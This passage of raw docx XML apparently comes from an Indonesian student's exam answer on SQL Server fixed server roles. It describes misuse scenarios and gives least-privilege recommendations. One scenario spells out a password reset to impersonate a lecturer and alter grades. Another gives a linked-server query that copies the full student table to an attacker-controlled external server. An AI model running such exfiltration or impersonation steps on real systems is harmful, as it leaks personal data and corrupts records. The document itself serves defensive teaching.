        <w:t xml:space="preserve">Aktivitas berbahaya terekam atas nama pengguna korban, bukan atas nama auditor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="E0A000" w:sz="4"/>
          <w:bottom w:val="single" w:color="E0A000" w:sz="4"/>
          <w:left w:val="single" w:color="E0A000" w:sz="12"/>
          <w:right w:val="single" w:color="E0A000" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="FFF2CC" w:val="clear"/>
        <w:spacing w:after="0" w:before="100"/>
        <w:ind w:left="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7B4A00"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠ Skenario Penyalahgunaan: Penyamaran Identitas oleh Auditor</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Auditor mengetahui bahwa LoginDosen memiliki akses untuk mengubah nilai mahasiswa.</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Menggunakan hak securityadmin, ia mereset password LoginDosen ke nilai yang ia ketahui.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Auditor kemudian login sebagai LoginDosen dan mengubah nilai salah satu mahasiswa</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dari C menjadi A di tabel Pengajuan_Pendadaran.</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Karena aktivitas terekam atas nama LoginDosen, auditor tidak langsung dicurigai.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Hal ini merupakan pelanggaran integritas data yang serius dan sulit dibuktikan.</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090"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5 Developer — setupadmin</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2200"/>
        <w:gridCol w:w="6826"/>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Fixed Server Role</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setupadmin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Login SQL Server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LoginDeveloper (SQL Server Authentication)</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Alasan Pemberian</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Developer perlu mengelola linked server untuk keperluan pengembangan integrasi sistem, misalnya koneksi ke sistem akademik pusat (SIAKAD), sistem keuangan, atau environment pengembangan. setupadmin mengizinkan pengelolaan linked server dan startup procedures tanpa memberikan akses ke data atau struktur database produksi.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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Hak Akses Utama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Menambah, mengubah, dan menghapus linked server; mengelola startup stored procedures.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="320"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Risiko Jika Role Diberikan Terlalu Tinggi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Developer dapat mendaftarkan linked server ke server eksternal yang tidak terotorisasi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Data produksi dapat diekspor ke server luar melalui query lintas server (cross-server query).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Linked server ke environment berbahaya dapat digunakan sebagai jalur injeksi atau eksfiltrasi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="E0A000" w:sz="4"/>
          <w:bottom w:val="single" w:color="E0A000" w:sz="4"/>
          <w:left w:val="single" w:color="E0A000" w:sz="12"/>
          <w:right w:val="single" w:color="E0A000" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="FFF2CC" w:val="clear"/>
        <w:spacing w:after="0" w:before="100"/>
        <w:ind w:left="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7B4A00"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠ Skenario Penyalahgunaan: Eksfiltrasi Data via Linked Server</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Developer mendaftarkan linked server bernama 'DEV_REMOTE' yang menunjuk ke server pribadi miliknya</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yang berada di luar jaringan institusi menggunakan hak setupadmin.</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Ia kemudian menjalankan query: INSERT INTO [DEV_REMOTE].ExternalDB.dbo.MahasiswaKopi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SELECT * FROM master.Mahasiswa; -- menyalin seluruh data mahasiswa ke server luar.</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Karena operasi ini menggunakan linked server yang terdaftar secara resmi,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E0A000" w:sz="4"/>
          <w:left w:val="single" w:color="E0A000" w:sz="12"/>
          <w:right w:val="single" w:color="E0A000" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="FFF9E6" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">firewall tidak membloknya dan aktivitas ini mungkin tidak terdeteksi oleh monitoring standar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Rekomendasi Keamanan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="320"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Berdasarkan analisis di atas, berikut rekomendasi untuk memperkuat keamanan sistem D_Monitoring_TA:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Terapkan prinsip Least Privilege: berikan hak akses minimal yang diperlukan untuk menjalankan tugas, tidak lebih.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Aktifkan CHECK_POLICY dan CHECK_EXPIRATION pada semua login untuk memaksa kebijakan password yang kuat.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Gunakan SQL Server Audit atau Extended Events untuk mencatat semua aktivitas login dan perubahan data sensitif.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lakukan review berkala terhadap keanggotaan fixed server role, terutama sysadmin dan securityadmin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Untuk auditor di lingkungan produksi, pertimbangkan penggunaan VIEW SERVER STATE dan VIEW ANY DEFINITION sebagai pengganti securityadmin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Pisahkan login untuk environment development dan production agar developer tidak dapat mengakses data produksi nyata.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Nonaktifkan login (DISABLE) segera setelah pengguna tidak lagi memerlukan akses (misal: karyawan resign).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Kesimpulan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="320"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Pemilihan fixed server role yang tepat merupakan fondasi keamanan sistem database. Terlalu longgar dalam pemberian role dapat membuka celah penyalahgunaan yang berbahaya; terlalu ketat dapat menghambat operasional. Dengan memahami fungsi setiap role, alasan pemberiannya, dan risiko yang menyertainya, pengelola sistem dapat menerapkan kontrol akses yang seimbang antara keamanan dan kebutuhan operasional.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="320"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Pada sistem D_Monitoring_TA, lima jenis pengguna telah dipetakan ke fixed server role yang sesuai dengan menggunakan minimal tiga fixed server role berbeda (sysadmin, dbcreator+bulkadmin, securityadmin, setupadmin), sambil memastikan Staf Input Data tidak mendapatkan hak berlebih di level server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5090" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="180"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Dokumen ini dibuat sebagai bagian dari jawaban Soal 8 — UCP Remedial Basis Data</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2026-06-06T20:09:24.170Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-06T20:09:24.172Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>